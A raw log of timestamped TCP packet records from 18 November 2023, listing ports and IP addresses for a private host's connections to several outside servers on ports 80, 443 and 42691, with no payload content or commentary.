Nov 18, 2023 10:02:37.462876081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462884903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462904930 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.464545965 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.464555979 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.468194962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.484940052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.484957933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.485007048 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.490097046 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490185976 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:37.490186930 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490201950 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490273952 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490288973 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490308046 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:37.490320921 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490358114 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:37.490375042 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490391970 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:37.490459919 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:37.490495920 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490509987 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490524054 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490536928 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490569115 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490582943 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:37.490618944 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:37.490679979 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:37.513658047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.514528990 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.519354105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.519372940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.519448996 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.538094997 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.538197041 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.538269997 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.538281918 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.538373947 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.538434982 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.538443089 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.538484097 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.538490057 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.538836002 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.538896084 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.538902044 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.538985968 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.539037943 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.539043903 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.539678097 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.539758921 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.539839029 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.539844036 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.539871931 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.539923906 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.540452003 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.540503979 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.540555000 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.540726900 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.540780067 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.540786028 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.541452885 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.541512012 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.541517973 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.541635990 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.542119980 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.542181969 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.542188883 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.542246103 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.542252064 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.591144085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.599275112 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.628896952 CET	49748	443	192.168.2.4	20.29.134.23
Nov 18, 2023 10:02:37.628973961 CET	443	49748	20.29.134.23	192.168.2.4
Nov 18, 2023 10:02:37.629066944 CET	49748	443	192.168.2.4	20.29.134.23
Nov 18, 2023 10:02:37.641685009 CET	49748	443	192.168.2.4	20.29.134.23
Nov 18, 2023 10:02:37.641721964 CET	443	49748	20.29.134.23	192.168.2.4
Nov 18, 2023 10:02:37.713011980 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.713196993 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.713274956 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.713289022 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.713423967 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.713479042 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.713485956 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.714175940 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.714195967 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.714262009 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.714270115 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.714292049 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.715061903 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.715121031 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.715127945 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.715262890 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.715862989 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.715933084 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.716737986 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.716813087 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.716850042 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.716908932 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.717595100 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.717674017 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.718420982 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.718487978 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.719351053 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.719414949 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.720099926 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.720163107 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.720204115 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.720258951 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.721085072 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.721141100 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.721146107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721165895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721184015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721201897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721211910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.721256018 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.721610069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721627951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721683979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.721688032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721705914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721724033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721740961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721766949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.721791983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.721889019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721905947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721923113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721944094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721949100 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.721962929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721966982 CET	443	49747	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:37.721978903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.721996069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722002029 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.722012997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722018957 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.722029924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722045898 CET	49747	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:37.722047091 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.722048044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722069025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.722095966 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.722225904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722290039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722332954 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.722359896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722383976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722400904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722418070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722434044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722445965 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.722470045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.722500086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722517967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722534895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722553015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722560883 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.722568989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.722587109 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.722609997 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723047018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723066092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723105907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723110914 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723125935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723254919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723272085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723289013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723300934 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723304987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723323107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723325014 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723339081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723351955 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723356962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723375082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723381042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723392010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723408937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723417044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723442078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723453999 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723459959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723475933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723500967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723592997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723609924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723654985 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723895073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723942041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723953962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.723961115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.723978043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724025011 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724109888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724127054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724143982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724155903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724159956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724176884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724186897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724191904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724210024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724226952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724232912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724244118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724260092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724261045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724278927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724287033 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724296093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724312067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724329948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724330902 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724347115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724363089 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724364042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724380016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724391937 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724396944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724415064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724423885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724431038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724446058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724463940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724463940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724481106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724488020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724498034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724514008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724531889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724545956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724554062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724565983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724570990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724587917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724594116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724603891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724622965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724637985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724638939 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724653959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724666119 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724670887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724688053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724704027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.724714994 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.724740982 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.726650000 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.733696938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.733774900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.733792067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.733808994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.733851910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.733886957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.734077930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734095097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734112978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734128952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734143019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.734146118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734153986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.734164000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734180927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734200954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734210014 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.734217882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734235048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734239101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.734251976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734258890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.734270096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734289885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.734447956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.734770060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734812975 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.734893084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734910965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734926939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734945059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734951973 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.734961033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734977961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.734996080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735003948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.735013008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735023975 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.735029936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735052109 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.735321045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735368967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.735374928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735460043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735479116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735496998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735521078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.735542059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735544920 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.735558987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735575914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735594034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735601902 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.735613108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735630035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735641956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.735646009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735688925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.735790014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735807896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735829115 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.735966921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.735984087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736001968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736018896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736020088 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736037016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736047029 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736053944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736083031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736128092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736165047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736176968 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736527920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736546040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736562967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736579895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736581087 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736605883 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736680031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736720085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736736059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736745119 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736756086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736772060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736785889 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736788034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736804962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736820936 CET	80	49744	194.49.94.120	192.168.2.4
